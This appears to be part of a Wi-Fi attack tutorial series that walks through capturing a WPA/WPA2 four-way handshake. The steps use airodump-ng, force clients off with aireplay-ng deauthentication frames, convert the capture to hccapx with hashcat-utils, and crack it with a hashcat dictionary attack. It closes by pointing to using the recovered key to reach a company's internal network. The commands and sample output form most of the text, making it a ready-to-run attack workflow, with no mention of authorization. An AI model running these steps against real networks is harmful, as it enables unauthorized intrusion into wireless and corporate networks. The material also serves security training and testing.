63 WiFi Hijacking hccapx Part 8

Wireless handshakes Crack wireless handshakes (WPA/WPA2) with Hashcat Although wireless isn't always the most exciting, it can be interesting if you can capture a WPA/WPA2 handshake. Wireless networks are often not properly segmented from a company's corporate network, and successful authentication to the wireless network may grant full access to the internal corporate network. Hashcat can be used to successfully crack both the MIC (4-way handshake) and the PMKID (packet/first handshake). MIC cracking When a client connecting to a wireless network on the wireless access point (AP) communicates, they must ensure that they both have/know the wireless network key but do not transmit the key over the network. The key is encrypted and authenticated by AP. To perform this type of offline cracking attack, we need to capture a valid four-way handshake by sending deauthentication frames to force a client (user) to disconnect from the AP. When the client reauthenticates (usually automatically), the attacker can attempt to sniff the 4-way WPA handshake without their knowledge. This handshake is a collection of keys exchanged during the authentication process between the client and the associated AP. These keys are used to generate a common key called the Message Integrity Check (MIC) used by an AP to ensure that each packet is undamaged and received in its original state. 4-way handshake capture: We will run the command in order to monitor a certain network, we will wait until the new client has connected, or we will disconnect the client from the network: We will run this command in the background, in order to receive an indication of the capture of the 4-way handshake: airodump-ng --bssid d4:35:1d:50:1e:fc --channel 1 --write wpa_handshake wlan0 You can disconnect them for a short time, just to capture the 4-way handshake: aireplay-ng --deauth 4 -a d4:35:1d:50:1e:fc -c 34:2f:bd:27:63:ea wlan0 There are indicators on the upper right side After we have successfully captured a 4-way handshake with a tool such as airodump-ng, we need to convert it to hccapx format that can be provided to Hashcat for cracking. Convert to hccapx format The required format is hccapx, and Hashcat hosts an online service to convert to this format https://hashcat.net/cap2hccapx To do the conversion offline, we need the hashcat-utils repository from GitHub. We can clone the repo and build the tool as follows: $ git clone https://github.com/hashcat/hashcat-utils.git $ cd hashcat-utils/src $make Cap2hccapx - Syntax $ ./cap2hccapx.bin usage: ./cap2hccapx.bin input.cap output.hccapx [filter by essid] [additional network essid:bssid] Next, we need to provide the tool with a packet capture (.cap) file to convert to hccapx format to provide to Hashcat. $ ./cap2hccapx.bin corp_capture1-01.cap mic_to_crack.hccapx Networks detected: 1 [*] BSSID=cc:40:d0:a4:d0:96 ESSID=CORP-WIFI (Length: 9) -- STA=48:e2:44:a7:c4:fb, Message Pair=0, Replay Counter=1 -- STA=48:e2:44:a7:c4:fb, Message Pair=2, Replay Counter=1 -- STA=48:e2:44:a7:c4:fb, Message Pair=0, Replay Counter=1 ... Written 8 WPA Handshakes to: /home/mrb3n/Desktop/mic_to_crack.hccapx With this file (mic_to_crack.hccapx), we can then proceed to crack For this example, we will perform a straight dictionary attack to crack the WPA handshake. To create a dictionary of words for the attack we will use rockyou.txt, Crunch is a Linux tool that can be used by you as well. To try to crack this hash, we'll use mode 2500, so our command will show hashcat -a 0 -m 2500 mic_to_crack.hccapx --deprecated-check-disable cell.txt Armed with this key, we can now attempt to authenticate to the wireless network and attempt to gain access to the company's internal network.